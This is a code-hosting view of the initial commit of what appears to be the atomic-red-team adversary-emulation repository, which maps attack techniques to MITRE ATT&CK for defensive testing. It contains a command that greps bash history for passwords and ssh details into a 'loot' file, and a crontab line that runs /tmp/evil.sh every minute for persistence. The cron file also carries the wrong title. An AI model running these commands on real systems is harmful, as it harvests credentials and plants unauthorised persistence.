security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Initial Commit

Browse Source 
Initial Checkin
This commit is contained in:
caseysmithrc
2017-10-11 10:35:17 -07:00
commit ac8dd2cfec
61 changed files with 1550 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
Linux/Credential_Access/Bash_History.md
+6
View File
@@ -0,0 +1,6 @@
# Bash History
MITRE ATT&CK Technique: [T1139](https://attack.mitre.org/wiki/Technique/T1139)
cat ~/.bash_history | grep -e '-p ' -e 'pass' -e 'ssh' > loot.txt
Linux/Linux.md
+21
View File
@@ -0,0 +1,21 @@
## MITRE ATT&CK Matrix - Linux
| Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Execution | Collection | Exfiltration | Command and Control |
|------------------------------|-------------------------------|-------------------------------|----------------------------------------|----------------------------------------|---------------------------------|--------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------|
| .bash_profile and .bashrc | Exploitation of Vulnerability | Binary Padding | [Bash History](Credential_Access/Bash_History.md) | Account Discovery | Application Deployment Software | Command-Line Interface | Audio Capture | Automated Exfiltration | Commonly Used Port |
| Bootkit | Setuid and Setgid | Clear Command History | Brute Force | File and Directory Discovery | Exploitation of Vulnerability | Graphical User Interface | Automated Collection | Data Compressed | Communication Through Removable Media |
| [Cron Job](Persistence/Cron_Job.md) | Sudo | Disabling Security Tools | Create Account | Permission Groups Discovery | Remote File Copy | Scripting | Clipboard Data | Data Encrypted | Connection Proxy |
| Hidden Files and Directories | Valid Accounts | Exploitation of Vulnerability | Credentials in Files | Process Discovery | Remote Services | Source | Data Staged | Data Transfer Size Limits | Custom Command and Control Protocol |
| Rc.common | Web Shell | File Deletion | Exploitation of Vulnerability | System Information Discovery | Third-party Software | Space after Filename | Data from Local System | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol |
| Redundant Access | | HISTCONTROL | Input Capture | System Network Configuration Discovery | | Third-party Software | Data from Network Shared Drive | Exfiltration Over Command and Control Channel | Data Encoding |
| Trap | | Hidden Files and Directories | Network Sniffing | System Network Connections Discovery | | Trap | Data from Removable Media | Exfiltration Over Other Network Medium | Data Obfuscation |
| Valid Accounts | | Indicator Removal from Tools | Private Keys | System Owner/User Discovery | | | Input Capture | Exfiltration Over Physical Medium | Fallback Channels |
| Web Shell | | Indicator Removal on Host | Two-Factor Authentication Interception | | | | Screen Capture | Scheduled Transfer | Multi-Stage Channels |
| | | Install Root Certificate | | | | | | | Multiband Communication |
| | | Masquerading | | | | | | | Multilayer Encryption |
| | | Redundant Access | | | | | | | Remote File Copy |
| | | Scripting | | | | | | | Standard Application Layer Protocol |
| | | Space after Filename | | | | | | | Standard Cryptographic Protocol |
| | | Timestomp | | | | | | | Standard Non-Application Layer Protocol |
| | | Valid Accounts | | | | | | | Uncommonly Used Port |
| | | | | | | | | | Web Service |
Linux/Persistence/Cron_Job.md
+6
View File
@@ -0,0 +1,6 @@
# Bash History
MITRE ATT&CK Technique: [T1168](https://attack.mitre.org/wiki/Technique/T1168)
echo "* * * * * /tmp/evil.sh" > /tmp/persistevil && crontab /tmp/persistevil